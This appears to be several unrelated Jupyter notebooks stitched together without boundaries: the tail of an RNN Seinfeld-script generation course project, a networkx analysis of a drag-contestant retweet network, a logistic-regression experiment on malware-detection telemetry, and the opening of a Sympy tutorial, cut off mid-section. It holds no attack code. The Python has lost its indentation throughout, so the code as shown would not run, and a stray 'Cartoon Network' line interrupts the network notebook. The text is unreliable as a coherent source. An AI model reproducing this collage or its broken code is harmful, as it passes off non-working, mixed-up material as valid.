- Set `n_layers` to the number of layers/cells in your RNN.
- Set `show_every_n_batches` to the number of batches at which the neural network should print progress.
If the network isn't getting the desired results, tweak these parameters and/or the layers in the `RNN` class.
```
# Data params
# Sequence Length
sequence_length = # of words in a sequence
# Batch Size
batch_size =
# data loader - do not change
train_loader = batch_data(int_text, sequence_length, batch_size)
# Training parameters
# Number of Epochs
num_epochs =
# Learning Rate
learning_rate =
# Model parameters
# Vocab size
vocab_size =
# Output size
output_size =
# Embedding Dimension
embedding_dim =
# Hidden Dimension
hidden_dim =
# Number of RNN Layers
n_layers =
# Show stats for every n number of batches
show_every_n_batches = 500
```
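If you want a concrete place to start, one plausible (illustrative, untuned) configuration is sketched below; every value here is an assumption to be revisited against your own loss curve, not the configuration used for any graded run:

```python
# Illustrative starting values only -- tune against your own loss curve.
sequence_length = 10             # words per input sequence
batch_size = 128
num_epochs = 10
learning_rate = 0.001            # a typical Adam starting point
vocab_size = len(vocab_to_int)   # assumes vocab_to_int from the checkpoint cell
output_size = vocab_size         # one score per vocabulary word
embedding_dim = 256
hidden_dim = 512
n_layers = 2
show_every_n_batches = 500
```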
### Train
In the next cell, you'll train the neural network on the pre-processed data. If you have a hard time getting a good loss, you may consider changing your hyperparameters. In general, you may get better results with larger hidden and n_layer dimensions, but larger models take a longer time to train.
> **You should aim for a loss less than 3.5.**
You should also experiment with different sequence lengths, which determine the size of the long range dependencies that a model can learn.
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
# create model and move to gpu if available
rnn = RNN(vocab_size, output_size, embedding_dim, hidden_dim, n_layers, dropout=0.5)
if train_on_gpu:
rnn.cuda()
# defining loss and optimization functions for training
optimizer = torch.optim.Adam(rnn.parameters(), lr=learning_rate)
criterion = nn.CrossEntropyLoss()
# training the model
trained_rnn = train_rnn(rnn, batch_size, optimizer, criterion, num_epochs, show_every_n_batches)
# saving the trained model
helper.save_model('./save/trained_rnn', trained_rnn)
print('Model Trained and Saved')
```
### Question: How did you decide on your model hyperparameters?
For example, did you try different sequence_lengths and find that one size made the model converge faster? What about your hidden_dim and n_layers; how did you decide on those?
**Answer:** (Write answer, here)
---
# Checkpoint
After running the above training cell, your model will be saved by name, `trained_rnn`, and if you save your notebook progress, **you can pause here and come back to this code at another time**. You can resume your progress by running the next cell, which will load in our word:id dictionaries _and_ load in your saved model by name!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL
"""
import torch
import helper
import problem_unittests as tests
_, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
trained_rnn = helper.load_model('./save/trained_rnn')
```
## Generate TV Script
With the network trained and saved, you'll use it to generate a new, "fake" Seinfeld TV script in this section.
### Generate Text
To generate the text, the network needs to start with a single word and repeat its predictions until it reaches a set length. You'll be using the `generate` function to do this. It takes a word id to start with, `prime_id`, and generates a set length of text, `predict_len`. Also note that it uses topk sampling to introduce some randomness in choosing the most likely next word, given an output set of word scores!
```
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
import torch.nn.functional as F
def generate(rnn, prime_id, int_to_vocab, token_dict, pad_value, predict_len=100):
"""
Generate text using the neural network
:param decoder: The PyTorch Module that holds the trained neural network
:param prime_id: The word id to start the first prediction
:param int_to_vocab: Dict of word id keys to word values
:param token_dict: Dict of puncuation tokens keys to puncuation values
:param pad_value: The value used to pad a sequence
:param predict_len: The length of text to generate
:return: The generated text
"""
rnn.eval()
# create a sequence (batch_size=1) with the prime_id
current_seq = np.full((1, sequence_length), pad_value)
current_seq[-1][-1] = prime_id
predicted = [int_to_vocab[prime_id]]
for _ in range(predict_len):
if train_on_gpu:
current_seq = torch.LongTensor(current_seq).cuda()
else:
current_seq = torch.LongTensor(current_seq)
# initialize the hidden state
hidden = rnn.init_hidden(current_seq.size(0))
# get the output of the rnn
output, _ = rnn(current_seq, hidden)
# get the next word probabilities
p = F.softmax(output, dim=1).data
if(train_on_gpu):
p = p.cpu() # move to cpu
# use top_k sampling to get the index of the next word
top_k = 5
p, top_i = p.topk(top_k)
top_i = top_i.numpy().squeeze()
# select the likely next word index with some element of randomness
p = p.numpy().squeeze()
word_i = np.random.choice(top_i, p=p/p.sum())
# retrieve that word from the dictionary
word = int_to_vocab[word_i]
predicted.append(word)
if(train_on_gpu):
current_seq = current_seq.cpu() # move to cpu
# the generated word becomes the next "current sequence" and the cycle can continue
if train_on_gpu:
current_seq = current_seq.cpu()
current_seq = np.roll(current_seq, -1, 1)
current_seq[-1][-1] = word_i
gen_sentences = ' '.join(predicted)
# Replace punctuation tokens
for key, token in token_dict.items():
ending = ' ' if key in ['\n', '(', '"'] else ''
gen_sentences = gen_sentences.replace(' ' + token.lower(), key)
gen_sentences = gen_sentences.replace('\n ', '\n')
gen_sentences = gen_sentences.replace('( ', '(')
# return all the sentences
return gen_sentences
```
### Generate a New Script
It's time to generate the text. Set `gen_length` to the length of TV script you want to generate and set `prime_word` to one of the following to start the prediction:
- "jerry"
- "elaine"
- "george"
- "kramer"
You can set the prime word to _any word_ in our dictionary, but it's best to start with a name for generating a TV script. (You can also start with any other names you find in the original text file!)
```
# run the cell multiple times to get different results!
gen_length = 400 # modify the length to your preference
prime_word = 'jerry' # name for starting the script
"""
DON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE
"""
pad_word = helper.SPECIAL_WORDS['PADDING']
generated_script = generate(trained_rnn, vocab_to_int[prime_word + ':'], int_to_vocab, token_dict, vocab_to_int[pad_word], gen_length)
print(generated_script)
```
#### Save your favorite scripts
Once you have a script that you like (or find interesting), save it to a text file!
```
# save script to a text file
f = open("generated_script_1.txt","w")
f.write(generated_script)
f.close()
```
# The TV Script is Not Perfect
It's ok if the TV script doesn't make perfect sense. It should look like alternating lines of dialogue; here is one such example of a few generated lines.
### Example generated script
>jerry: what about me?
>
>jerry: i don't have to wait.
>
>kramer:(to the sales table)
>
>elaine:(to jerry) hey, look at this, i'm a good doctor.
>
>newman:(to elaine) you think i have no idea of this...
>
>elaine: oh, you better take the phone, and he was a little nervous.
>
>kramer:(to the phone) hey, hey, jerry, i don't want to be a little bit.(to kramer and jerry) you can't.
>
>jerry: oh, yeah. i don't even know, i know.
>
>jerry:(to the phone) oh, i know.
>
>kramer:(laughing) you know...(to jerry) you don't know.
You can see that there are multiple characters that say (somewhat) complete sentences, but it doesn't have to be perfect! It takes quite a while to get good results, and often, you'll have to use a smaller vocabulary (and discard uncommon words), or get more data. The Seinfeld dataset is about 3.4 MB, which is big enough for our purposes; for script generation you'll want more than 1 MB of text, generally.
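As a rough sketch of the vocabulary-trimming idea mentioned above (the function name and threshold are hypothetical, not part of the project code), one way to discard uncommon words is to count occurrences and keep only frequent ones:

```
from collections import Counter

def trim_vocab(words, min_count=2):
    """Keep only words that occur at least `min_count` times."""
    counts = Counter(words)
    return {w for w, c in counts.items() if c >= min_count}

text = "jerry hello hello newman newman newman".split()
print(trim_vocab(text))  # only 'hello' and 'newman' occur often enough
```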
# Submitting This Project
When submitting this project, make sure to run all the cells before saving the notebook. Save the notebook file as "dlnd_tv_script_generation.ipynb" and save another copy as an HTML file by clicking "File" -> "Download as.."->"html". Include the "helper.py" and "problem_unittests.py" files in your submission. Once you download these files, compress them into one zip file for submission.
```
import networkx as nx
import pandas as pd
import numpy as np
from statsmodels.distributions.empirical_distribution import ECDF
import matplotlib.pyplot as plt
from scipy.stats import poisson
import scipy.stats as stats
from scipy.spatial import distance
from dragsUtility import *
import json
import twitter
import numpy as np; np.random.seed(0)
import seaborn as sns; sns.set_theme()
df = pd.read_csv('Data/rutweet.csv')
graph = nx.from_pandas_edgelist(df, source="source", target="target", edge_attr="weight", create_using=nx.DiGraph)
```
# Preprocessing
Removing self-loops
```
graph.remove_edges_from(nx.selfloop_edges(graph))
```
Cartoon Network
# Network info
```
print("Number of nodes {}".format(graph.order()))
print("Number of edges {}".format(graph.size()))
print("Is the graph a DAG? {}".format(nx.is_directed_acyclic_graph(graph)))
print("Density {}".format(nx.density(graph)))
```
## Degree Analysis
### In-Degree + Out-Degree = Degree
Mean, median, standard deviation, interquartile range, minimum, and maximum are good summary statistics for the distribution.
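Before summarizing the distribution, the identity in the heading can be sanity-checked on a toy directed graph (a sketch, not the project data):

```
# For every node of a DiGraph, degree = in-degree + out-degree.
import networkx as nx

g = nx.DiGraph([(1, 2), (2, 3), (3, 1), (1, 3)])
for n in g:
    assert g.degree(n) == g.in_degree(n) + g.out_degree(n)
print("degree identity holds for all nodes")
```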
```
degrees = list(dict(graph.degree(weight="weight")).values())
print('Mean degree: \t'+ str(np.mean(degrees)))
print('Standard deviation: ' + str(np.std(degrees)))
print('Median: ' + str(np.median(degrees)))
print('iqr: ' + str(np.quantile(degrees, 0.75) - np.quantile(degrees, 0.25)))
print('Min: ' + str(np.min(degrees)))
print('Max: ' + str(np.max(degrees)))
random_graph_erdos = nx.fast_gnp_random_graph(len(graph.nodes), nx.density(graph))
random_degrees = list(dict(random_graph_erdos.degree()).values())
cdf = ECDF(degrees)
x = np.unique(degrees)
y = cdf(x)
cdf_random = ECDF(random_degrees)
x_random = np.unique(random_degrees)
y_random = cdf_random(x_random)
fig_cdf_fb = plt.figure(figsize=(10,5))
axes = fig_cdf_fb.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(x,1-y,marker='o',ms=8, linestyle='-', label = "Ru Net", color = "#61CAE2")
axes.loglog(x_random,1-y_random,marker='D',ms=10, linestyle='-', label="Random", color = "#EA63BD")
axes.legend()
axes.set_xlabel('Degree',size=20)
axes.set_ylabel('ECCDF', size = 20)
plt.savefig("Images/DegreeDistribution.png", dpi=1200, bbox_inches='tight')
plt.show()
```
### In-Degree
```
in_degrees_noitems = dict(graph.in_degree(weight='weight'))
in_degrees = list(in_degrees_noitems.values())
print('Mean degree: \t'+ str(np.mean(in_degrees)))
print('Standard deviation: ' + str(np.std(in_degrees)))
print('Median: ' + str(np.median(in_degrees)))
print('iqr: ' + str(np.quantile(in_degrees, 0.75) - np.quantile(in_degrees, 0.25)))
print('Min: ' + str(np.min(in_degrees)))
print('Max: ' + str(np.max(in_degrees)))
```
Is the node with the highest in-degree a contestant?
```
pippo = dict(graph.in_degree(weight="weight"))
sortedPippo = {k: v for k, v in sorted(pippo.items(), key=lambda item: item[1], reverse=True)}
dragsUtility= DragsUtility()
dragsUtility.isaDrag(str(list(sortedPippo.keys())[0]))
random_digraph_erdos = nx.fast_gnp_random_graph(len(graph.nodes), nx.density(graph), directed=True)
random_in_degrees = list(dict(random_digraph_erdos.in_degree(weight="weight")).values())
cdf = ECDF(in_degrees)
x = np.unique(in_degrees)
y = cdf(x)
cdf_random = ECDF(random_in_degrees)
x_random = np.unique(random_in_degrees)
y_random = cdf_random(x_random)
fig_cdf_fb = plt.figure(figsize=(10,5))
axes = fig_cdf_fb.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(x,1-y,marker='o',ms=8, linestyle='-', label = "Ru Net", color = "#61CAE2")
axes.loglog(x_random,1-y_random,marker='D',ms=10, linestyle='-', label="Random", color = "#EA63BD")
axes.legend()
axes.set_xlabel('In-Degree',size=20)
axes.set_ylabel('ECCDF', size = 20)
plt.savefig("Images/InDegreeDistribution.png", dpi=1200, bbox_inches='tight')
plt.show()
```
### Out-degree
```
out_degrees_dict = dict(graph.out_degree(weight="weight"))
out_degrees = list(out_degrees_dict.values())
print('Mean degree: \t'+ str(np.mean(out_degrees)))
print('Standard deviation: ' + str(np.std(out_degrees)))
print('Median: ' + str(np.median(out_degrees)))
print('iqr: ' + str(np.quantile(out_degrees, 0.75) - np.quantile(out_degrees, 0.25)))
print('Min: ' + str(np.min(out_degrees)))
print('Max: ' + str(np.max(out_degrees)))
random_out_degrees = list(dict(random_digraph_erdos.out_degree(weight="weight")).values())
cdf = ECDF(out_degrees)
x = np.unique(out_degrees)
y = cdf(x)
cdf_random = ECDF(random_out_degrees)
x_random = np.unique(random_out_degrees)
y_random = cdf_random(x_random)
fig_cdf_fb = plt.figure(figsize=(10,5))
axes = fig_cdf_fb.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(x,1-y,marker='D',ms=8, linestyle='-', label = "Ru Net", color = "#61CAE2")
axes.loglog(x_random,1-y_random,marker='8',ms=10, linestyle='-', label="Random", color = "#EA63BD")
axes.legend()
axes.set_xlabel('Out-Degree',size=20)
axes.set_ylabel('ECCDF', size = 20)
plt.savefig("Images/OutDegreeDistribution.png", dpi=1200, bbox_inches='tight')
plt.show()
cdf_out = ECDF(out_degrees)
x_out = np.unique(out_degrees)
y_out = cdf_out(x_out)
cdf_in = ECDF(in_degrees)
x_in = np.unique(in_degrees)
y_in = cdf_in(x_in)
fig_cdf_fb = plt.figure(figsize=(10,5))
axes = fig_cdf_fb.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(x_out,1-y_out,marker='o',ms=8, linestyle='-', label = "Out-degree", color = "#61CAE2")
axes.loglog(x_in,1-y_in,marker='o',ms=10, linestyle='-', label="In-degree", color = "#91D2BE")
axes.legend()
axes.set_xlabel('In-Out-Degree',size=20)
axes.set_ylabel('ECCDF', size = 20)
```
## Connectivity
```
nx.is_strongly_connected(graph),nx.is_weakly_connected(graph)
```
Is there a giant component?
```
components_strong = nx.strongly_connected_components(graph)
components_weak = nx.weakly_connected_components(graph)
component_list_strong = list(components_strong)
component_list_weak = list(components_weak)
```
Number of connected components:
```
print("Strongly connected components: {}".format(len(component_list_strong)))
print("Weakly connected components: {}".format(len(component_list_weak)))
len_cc = [len(wcc) for wcc in component_list_weak]
counts = pd.Series(len_cc).value_counts().sort_index()
fig_gc = plt.figure(figsize=(8,4))
axes = fig_gc.gca()
axes.set_xscale('log')
axes.set_yscale('log')
axes.loglog(counts.index,counts.values,marker='o',ms=8, linestyle='None', color = "#EA63BD")
axes.set_xlabel('Weakly connected component size',size=20)
axes.set_ylabel('Count', size = 20)
plt.savefig("Images/ConnectedComponents.png", dpi=1200, bbox_inches='tight')
plt.show()
```
## Small World
```
sorted_components = sorted(component_list_weak, key = lambda x : len(x), reverse=True)
giant_component = graph.subgraph(sorted_components[0]).to_undirected()
# nx.diameter(giant_component)
```
The diameter is 12.
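As a toy illustration of what the commented-out computation measures (the diameter is the longest shortest path in the graph; this is not the project data):

```
import networkx as nx

g = nx.path_graph(5)      # 0-1-2-3-4
print(nx.diameter(g))     # the two endpoints are 4 hops apart
```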
## Transitivity
```
# global_clustering_coeff = nx.transitivity(graph.to_undirected())
# print("Global clustering coefficient: {}".format(global_clustering_coeff))
```
Global clustering coefficient: 0.0016440739612106675
```
# avg_local_clustering_coeff = nx.average_clustering(graph.to_undirected())
# avg_local_clustering_coeff0 = nx.average_clustering(graph.to_undirected(), count_zeros=False)
# print('Mean local clustering coefficient: {}'.format(avg_local_clustering_coeff))
# print('Mean local clustering coefficient (zeros excluded): {}'.format(avg_local_clustering_coeff0))
```
Mean local clustering coefficient: 0.18450772763547055
Mean local clustering coefficient (zeros excluded): 0.5825613071721611
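A small toy example (not the project data) may clarify why the two clustering measures above differ:

```
# Transitivity is a global, triangle-based ratio; average clustering
# averages each node's local coefficient, so pendant nodes drag it down.
import networkx as nx

g = nx.Graph([(1, 2), (2, 3), (1, 3), (3, 4)])  # one triangle plus a pendant edge
print(nx.transitivity(g))        # 3 * triangles / connected triples = 3/5
print(nx.average_clustering(g))  # (1 + 1 + 1/3 + 0) / 4 = 7/12
```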
## Reciprocity
```
print('Reciprocity: {}'.format(nx.overall_reciprocity(graph)))
```
Very low reciprocity is typical of an information network.
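As a toy illustration of how `nx.overall_reciprocity` behaves (hypothetical graph, not the project data): it is the fraction of directed edges whose reverse edge also exists.

```
import networkx as nx

g = nx.DiGraph([(1, 2), (2, 1), (2, 3)])
print(nx.overall_reciprocity(g))  # 2 of the 3 edges are reciprocated -> 2/3
```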
# Centrality
```
p99_indeg = np.percentile(in_degrees,99.9)
influencers_id = [(str(k),v) for k,v in in_degrees_noitems.items() if v>=p99_indeg]
bearer_token = json.load(open('application_keys.json'))['twitter']['bearer_token']
twitter_api = twitter.Twitter(auth=twitter.OAuth2(bearer_token=bearer_token))
in_deg_cen = nx.in_degree_centrality(graph)
out_deg_cen = nx.out_degree_centrality(graph)
influencers_username_centrality = [(twitter_api.users.show(user_id=k)['screen_name'],v,\
in_deg_cen[int(k)],out_degrees_dict[int(k)], out_deg_cen[int(k)], dragsUtility.isaDrag(str(k))) for (k,v) in influencers_id]
influencers_table = pd.DataFrame(influencers_username_centrality,\
columns=['user','in_degree','in_degree_centrality','out_degree','out_degree_centrality','isaCompetitor'])
influencers_table.set_index('user',inplace=True)
influencers_table.sort_values(by='in_degree_centrality',inplace=True,ascending=False)
influencers_table
influencers_table.to_csv('toTable/influencers.csv')
```
Not all contestants are among the influencers.
```
ranking_by_degree_centrality = influencers_table.loc[influencers_table['isaCompetitor'] == True]
ranking_by_degree_centrality
len(ranking_by_degree_centrality)
contestant_degree = list(filter(lambda x: dragsUtility.isaDrag(str(x[0])),list(in_degrees_noitems.items())))
contestant_degree_centrality = [( dragsUtility.getInfoAboutQueenByID(str(k))["Name"] ,v,\
in_deg_cen[int(k)],out_degrees_dict[int(k)], out_deg_cen[int(k)]) for (k,v) in contestant_degree]
contestant_degree_table = pd.DataFrame(contestant_degree_centrality,\
columns=['contestant','in_degree','in_degree_centrality','out_degree','out_degree_centrality'])
contestant_degree_table.sort_values(by='in_degree_centrality',inplace=True,ascending=False)
contestant_degree_table
centrality_rankings = {}
centrality_rankings['in_degree_centrality'] = list(contestant_degree_table["contestant"])
```
**PageRank**
```
# pagerank = nx.pagerank(graph, alpha=0.9, weight="weight")
# pagerank2 = list(filter(lambda x: dragsUtility.isaDrag(str(x[0])), pagerank.items()))
# contestant_pagerank = [ (dragsUtility.getInfoAboutQueenByID(str(k))["Name"], v) for (k,v) in pagerank2]
# contestant_pagerank = list(sorted( contestant_pagerank,key=lambda x: x[1], reverse=True))
# centrality_rankings['pageRank'] = [ k for (k,v) in contestant_pagerank]
# centrality_rankings['pageRank']
```
**Betweenness Centrality**
```
# beetweeness = nx.betweenness_centrality(graph, weight="weight")
# beetweeness2 = list(filter(lambda x: dragsUtility.isaDrag(str(x[0])), beetweeness.items()))
# contestant_beetweeness = [ (dragsUtility.getInfoAboutQueenByID(str(k))["Name"], v) for (k,v) in beetweeness2]
# contestant_beetweeness = list(sorted( contestant_beetweeness,key=lambda x: x[1], reverse=True))
# centrality_rankings['betweenness_centrality'] = [ k for (k,v) in contestant_beetweeness]
# centrality_rankings['betweenness_centrality']
```
**Harmonic Centrality**
```
sources = list(filter(lambda x: dragsUtility.isaDrag(str(x)),list(graph.nodes)))
# harmonic = nx.harmonic_centrality(graph, nbunch=sources)
# harmonic2 = list(harmonic.items())
# contestant_harmonic = [ (dragsUtility.getInfoAboutQueenByID(str(k))["Name"], v) for (k,v) in harmonic2]
# contestant_harmonic = list(sorted( contestant_harmonic, key=lambda x: x[1], reverse=True))
# centrality_rankings['harmonic_centrality'] = [ k for (k,v) in contestant_harmonic]
# centrality_rankings['harmonic_centrality']
# harmonic_df = pd.DataFrame(contestant_harmonic, columns=["contestant", "harmonic_centrality"])
# harmonic_df.to_csv("harmonic_final.csv", index=False)
# import json
# with open('Data/rankings.json', 'w') as f:
# json.dump(centrality_rankings, f, indent=1)
centrality_table = pd.read_json('Data/rankings.json')
centrality_table["real_rank"] = dragsUtility.getRealRanking()
centrality_table = centrality_table[['real_rank', 'in_degree_centrality', 'pageRank', 'betweenness_centrality', 'harmonic_centrality']]
centrality_table
centrality_table = pd.read_json('Data/rankings.json')
centrality_table["real_rank"] = dragsUtility.getRealRanking()
centrality_table.to_csv("toTable/rankings.csv")
```
## Ranking distances
```
def get_distances(rank, real_rank):
tau, p_value = stats.kendalltau(rank, real_rank)
return {"kendall_tau": tau, "hamming": 1 - (distance.hamming(rank, real_rank))}
distance_json = {}
real_rank = dragsUtility.getRealRanking()
distance_json["in_degree_centrality"] = get_distances(list(centrality_table["in_degree_centrality"]), real_rank)
distance_json["pageRank"] = get_distances(list(centrality_table["pageRank"]), real_rank)
distance_json["betweenness_centrality"] = get_distances(list(centrality_table["betweenness_centrality"]), real_rank)
distance_json["harmonic_centrality"] = get_distances(list(centrality_table["harmonic_centrality"]), real_rank)
distance_json["DB"] = get_distances(dragsUtility.getDBRanking(), real_rank)
distance_json["age"] = get_distances(dragsUtility.getAgeRankig(), real_rank)
distance_json["real"] = get_distances(real_rank, real_rank)
distance_json
distance_table = pd.DataFrame.from_dict(distance_json, orient='index')
distance_table
distance_table.to_csv("toTable/distance.csv")
```
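As a toy sanity check of the Kendall tau used in `get_distances` above (hypothetical rankings, not the project data): identical rankings score 1, while a fully reversed ranking scores -1.

```
from scipy.stats import kendalltau

rank = [1, 2, 3, 4]
tau_same, _ = kendalltau(rank, rank)       # identical rankings
tau_rev, _ = kendalltau(rank, rank[::-1])  # fully reversed ranking
print(tau_same, tau_rev)
```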
## Jaccard Similarity
```
def structural_equivalence_jaccard(graph, node1, node2):
neighbourn1, neighbourn2 = set(graph[node1].keys()),set(graph[node2].keys())
union = len(neighbourn1.union(neighbourn2))
inter = len(neighbourn1.intersection(neighbourn2))
return (inter/union) if (union > 0) else 0
sources = list(filter(lambda x: dragsUtility.isaDrag(str(x)),list(graph.nodes)))
similarity = [ tuple( ([dragsUtility.getInfoAboutQueenByID(str(node1))["Name"]] + [ structural_equivalence_jaccard(graph.to_undirected(), node1, node2) for node2 in sources ] )) \
for node1 in sources]
sources_names = [ dragsUtility.getInfoAboutQueenByID(str(drag))["Name"] for drag in sources]
data = pd.DataFrame(similarity, columns= ["contestant"] + sources_names)
data = data.set_index("contestant")
fig, ax = plt.subplots(figsize=(9,8))
ax = sns.heatmap(data, center = 0.45)
plt.savefig("Images/StructuralSimilarity.png", dpi=1200, bbox_inches='tight')
plt.show()
```
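A toy check of the Jaccard structural-equivalence idea above (hypothetical small graph, not the project data): nodes 1 and 2 share one of their three distinct neighbours.

```
import networkx as nx

g = nx.Graph([(1, 3), (1, 4), (2, 3), (2, 5)])
n1, n2 = set(g[1]), set(g[2])
jac = len(n1 & n2) / len(n1 | n2)
print(jac)  # |{3}| / |{3, 4, 5}| = 1/3
```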
Varying the values assigned to `max_iter` for experimentation.
```
#Import the libraries
import pandas as pd
import numpy as np
from tqdm import tqdm
from sklearn import linear_model, metrics, preprocessing, model_selection
from sklearn.preprocessing import StandardScaler
import xgboost as xgb
#Load the data
modeling_dataset = pd.read_csv('/content/drive/MyDrive/prediction/frac_cleaned_fod_data.csv', low_memory = False)
#All columns - except 'HasDetections', 'kfold', and 'MachineIdentifier'
train_features = [tf for tf in modeling_dataset.columns if tf not in ('HasDetections', 'kfold', 'MachineIdentifier')]
#The features selected based on the feature selection method earlier employed
train_features_after_selection = ['AVProductStatesIdentifier', 'Processor','AvSigVersion', 'Census_TotalPhysicalRAM', 'Census_InternalPrimaryDiagonalDisplaySizeInInches',
'Census_IsVirtualDevice', 'Census_PrimaryDiskTotalCapacity', 'Wdft_IsGamer', 'Census_IsAlwaysOnAlwaysConnectedCapable', 'EngineVersion',
'Census_ProcessorCoreCount', 'Census_OSEdition', 'Census_OSInstallTypeName', 'Census_OSSkuName', 'AppVersion', 'OsBuildLab', 'OsSuite',
'Firewall', 'IsProtected', 'Census_IsTouchEnabled', 'Census_ActivationChannel', 'LocaleEnglishNameIdentifier','Census_SystemVolumeTotalCapacity',
'Census_InternalPrimaryDisplayResolutionHorizontal','Census_HasOpticalDiskDrive', 'OsBuild', 'Census_InternalPrimaryDisplayResolutionVertical',
'CountryIdentifier', 'Census_MDC2FormFactor', 'GeoNameIdentifier', 'Census_PowerPlatformRoleName', 'Census_OSWUAutoUpdateOptionsName', 'SkuEdition',
'Census_OSVersion', 'Census_GenuineStateName', 'Census_OSBuildRevision', 'Platform', 'Census_ChassisTypeName', 'Census_FlightRing',
'Census_PrimaryDiskTypeName', 'Census_OSBranch', 'Census_IsSecureBootEnabled', 'OsPlatformSubRelease']
#Define the categorical features of the data
categorical_features = ['ProductName',
'EngineVersion',
'AppVersion',
'AvSigVersion',
'Platform',
'Processor',
'OsVer',
'OsPlatformSubRelease',
'OsBuildLab',
'SkuEdition',
'Census_MDC2FormFactor',
'Census_DeviceFamily',
'Census_PrimaryDiskTypeName',
'Census_ChassisTypeName',
'Census_PowerPlatformRoleName',
'Census_OSVersion',
'Census_OSArchitecture',
'Census_OSBranch',
'Census_OSEdition',
'Census_OSSkuName',
'Census_OSInstallTypeName',
'Census_OSWUAutoUpdateOptionsName',
'Census_GenuineStateName',
'Census_ActivationChannel',
'Census_FlightRing']
#Function for Logistic Regression Classification - max_iter = 100
def opt_run_lr100(fold, _iter):
#Get training and validation data using folds
cleaned_fold_datasets_train = modeling_dataset[modeling_dataset.kfold != fold].reset_index(drop=True)
cleaned_fold_datasets_valid = modeling_dataset[modeling_dataset.kfold == fold].reset_index(drop=True)
#Initialize OneHotEncoder from scikit-learn, and fit it on training and validation features
ohe = preprocessing.OneHotEncoder()
full_data = pd.concat(
[cleaned_fold_datasets_train[train_features_after_selection],cleaned_fold_datasets_valid[train_features_after_selection]],
axis = 0
)
ohe.fit(full_data[train_features_after_selection])
#transform the training and validation data
x_train = ohe.transform(cleaned_fold_datasets_train[train_features_after_selection])
x_valid = ohe.transform(cleaned_fold_datasets_valid[train_features_after_selection])
#Initialize the Logistic Regression Model
lr_model = linear_model.LogisticRegression(
penalty= 'l2',
C = 49.71967742639108,
solver= 'lbfgs',
max_iter= _iter,
n_jobs=-1
)
#Fit model on training data
lr_model.fit(x_train, cleaned_fold_datasets_train.HasDetections.values)
#Predict on the validation data using the probability for the AUC
valid_preds = lr_model.predict_proba(x_valid)[:, 1]
#For precision and Recall
valid_preds_pc = lr_model.predict(x_valid)
#Get the ROC AUC score
auc = metrics.roc_auc_score(cleaned_fold_datasets_valid.HasDetections.values, valid_preds)
#Get the precision score
pre = metrics.precision_score(cleaned_fold_datasets_valid.HasDetections.values, valid_preds_pc, average='binary')
#Get the Recall score
rc = metrics.recall_score(cleaned_fold_datasets_valid.HasDetections.values, valid_preds_pc, average='binary')
return auc, pre, rc
lr100 = []
for _iter in range(50,350,50):
for fold in tqdm(range(10)):
lr100.append(opt_run_lr100(fold, _iter))
lr100
len(lr100)
#Plotting graph: mean AUC vs. number of iterations for the Logistic Regression model
#The different values of max_iter used
iters = [50, 100, 150, 200, 250, 300]
#lr100 holds one (auc, precision, recall) tuple per fold, 10 folds per
#max_iter value, so average the AUC over each consecutive block of 10 results
lr100_auc = []
for idx in range(len(iters)):
    fold_results = lr100[idx * 10:(idx + 1) * 10]
    lr100_auc.append(sum(r[0] for r in fold_results) / len(fold_results))
#Let's print the AUC
print(lr100_auc)
import matplotlib.pyplot as plt
plt.plot(iters, lr100_auc)
plt.title('AUC versus Number of Iterations in Logistic Regression')
plt.xlabel('Number of Iterations')
plt.ylabel('AUC')
plt.show()
```
Bar chart to compare the performance of Logistic Regression and XGBoost at each stage of model building.
```
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
labels = ['Logistic Regression', 'XGBoost']
basic_model = [0.67121, 0.62663]
target_encoding = [0.67159, 0.61663]
best_features = [0.67233, 0.66524]
lowvariance_removed = [0.63243, 0.66254]
bestparams_bestfeatures = [0.67241, 0.65837]
x = np.arange(len(labels)) # the label locations
width = 0.1 # the width of the bars
plt.figure(figsize=(15,8))
plt.bar(x-0.1, basic_model, width, label = 'Basic Model')
plt.bar(x, target_encoding, width, label = 'Target Encoding')
plt.bar(x+0.1, best_features, width, label = 'Best Selected Features')
plt.bar(x+0.2, lowvariance_removed, width, label = 'Low Variance Features Removed')
plt.bar(x+0.3, bestparams_bestfeatures, width, label = 'Best Params and Best Selected Features')
plt.xticks(x, labels)
plt.xlabel("Models")
plt.ylabel("Accuracy Scores")
plt.title("Accuracy Scores for each stage in the model building")
plt.legend()
plt.show()
```
# Symbolic mathematics with Sympy
[Sympy](http://www.sympy.org/en/index.html) is described as a:
> "... Python library for symbolic mathematics."
This means it can be used to:
- Manipulate symbolic expressions;
- Solve symbolic equations;
- Carry out symbolic Calculus;
- Plot symbolic functions.
It has other capabilities that we will not go in to in this handbook. But you can read more about it here: http://www.sympy.org/en/index.html
## Manipulating symbolic expressions
Before we can start using the library to manipulate expressions, we need to import it.
```
import sympy as sym
```
The above imports the library and gives us access to its commands via the shorthand `sym`, which is conventionally used.
If we wanted to get Python to check that $x - x = 0$ we would get an error if we did not tell Python what $x$ was.
This is where Sympy comes in: we can tell Python to create $x$ as a symbolic variable:
```
x = sym.symbols('x')
```
Now we can calculate $x - x$:
```
x - x
```
We can create and manipulate expressions in Sympy. Let us for example verify:
$$(a + b) ^ 2 = a ^ 2 + 2ab + b ^2$$
First, we create the symbolic variables $a, b$:
```
a, b = sym.symbols('a, b')
```
Now let's create our expression:
```
expr = (a + b) ** 2
expr
```
**Note** we can get Sympy to use LaTeX so that the output looks nice in a notebook:
```
sym.init_printing()
expr
```
Let us expand our expression:
```
expr.expand()
```
Note that we can also get Sympy to produce the LaTeX code for future use:
```
sym.latex(expr.expand())
```
---
**EXERCISE** Use Sympy to verify the following expressions:
- $(a - b) ^ 2 = a ^ 2 - 2 a b + b^2$
- $a ^ 2 - b ^ 2 = (a - b) (a + b)$ (instead of using `expand`, try `factor`)
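One possible approach to the exercise, as a self-contained sketch (it repeats the symbol definitions):

```
import sympy as sym

a, b = sym.symbols('a, b')
print(((a - b) ** 2).expand())     # a**2 - 2*a*b + b**2
print((a ** 2 - b ** 2).factor())  # (a - b)*(a + b)
```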
## Solving symbolic equations
We can use Sympy to solve symbolic equations. For example, let's find the solutions in $x$ of the quadratic equation:
$$a x ^ 2 + b x + c = 0$$
```
